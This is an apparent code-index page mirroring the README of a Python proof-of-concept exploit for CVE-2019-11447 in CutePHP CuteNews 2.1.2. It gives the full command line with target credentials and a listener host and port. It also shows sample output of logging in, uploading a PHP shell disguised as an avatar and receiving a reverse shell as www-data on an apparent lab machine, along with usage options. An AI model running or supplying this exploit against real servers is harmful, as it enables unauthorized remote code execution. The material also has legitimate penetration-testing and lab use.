倒排索引/搜索引擎>> cve-2019-11447>> 返回
项目作者: thewhiteh4t

项目描述 :
CutePHP Cute News 2.1.2 RCE PoC
高级语言: Python
项目地址: git://github.com/thewhiteh4t/cve-2019-11447.git
创建时间: 2021-03-18T09:24:29Z
项目社区:https://github.com/thewhiteh4t/cve-2019-11447
开源协议:
下载


CVE-2019-11447

CutePHP Cute News 2.1.2 RCE PoC

Target : 2.1.2

This PoC script is based on a simple implementation of the original exploit by BobbySox. The original exploit is an MSF module by Akuss.

This script needs the target ip address or domain along with credentials and it will automatically login, upload payload, trigger it and catch the reverse shell.

  1. python cve-2019-11447.py -t 10.10.10.206 -u twh -p p4ssw0rd -lh 10.10.16.2 -lp 4444 -f shell
  3. --------------------------------------
  4. --- CVE-2019-11447 -------------------
  5. --- CuteNews Arbitrary File Upload ---
  6. --- CutePHP CuteNews 2.1.2 -----------
  7. --------------------------------------
  9. [>] Found By : Akkus       [ https://twitter.com/ehakkus     ]
  10. [>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
  12. [>] Target   : http://10.10.10.206/CuteNews/index.php
  13. [>] Username : twh
  14. [>] Password : p4ssw0rd
  16. [!] Logging in...
  17. [+] Logged In!
  18. [+] Loading Profile...
  19. [+] Searching Signatures...
  20. [!] Uploading Payload...
  21. [+] Loading Profile...
  22. [+] Searching Avatar URL...
  23. [*] URL : http://passage.htb/CuteNews/uploads/avatar_twh_shell.php
  24. [!] Payload will trigger in 5 seconds...
  25. [!] Starting Listner...
  26. [+] Trying to bind to :: on port 4444: Done
  27. [+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.206 on port 35196
  28. [*] Switching to interactive mode
  29. bash: cannot set terminal process group (1656): Inappropriate ioctl for device
  30. bash: no job control in this shell
  31. www-data@passage:/var/www/html/CuteNews/uploads$ $ id
  32. id
  33. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  34. www-data@passage:/var/www/html/CuteNews/uploads$ $

Dependencies

  1. pip3 install requests bs4 pwntools

Usage

  1. python cve-2019-11447.py -h
  2. usage: cve-2019-11447.py [-h] [-t TARGET] [-u UNAME] [-p PASSW] [-lh LHOST] [-lp LPORT] [-f FILE]
  4. optional arguments:
  5.   -h, --help                    show this help message and exit
  6.   -t TARGET, --target TARGET    Target IP address or domain
  7.   -u UNAME, --uname UNAME       Username
  8.   -p PASSW, --passw PASSW       Password
  9.   -lh LHOST, --lhost LHOST      Listener IP address
  10.   -lp LPORT, --lport LPORT      Listener Port
  11.   -f FILE, --file FILE          Filename for payload WITHOUT extension

Credits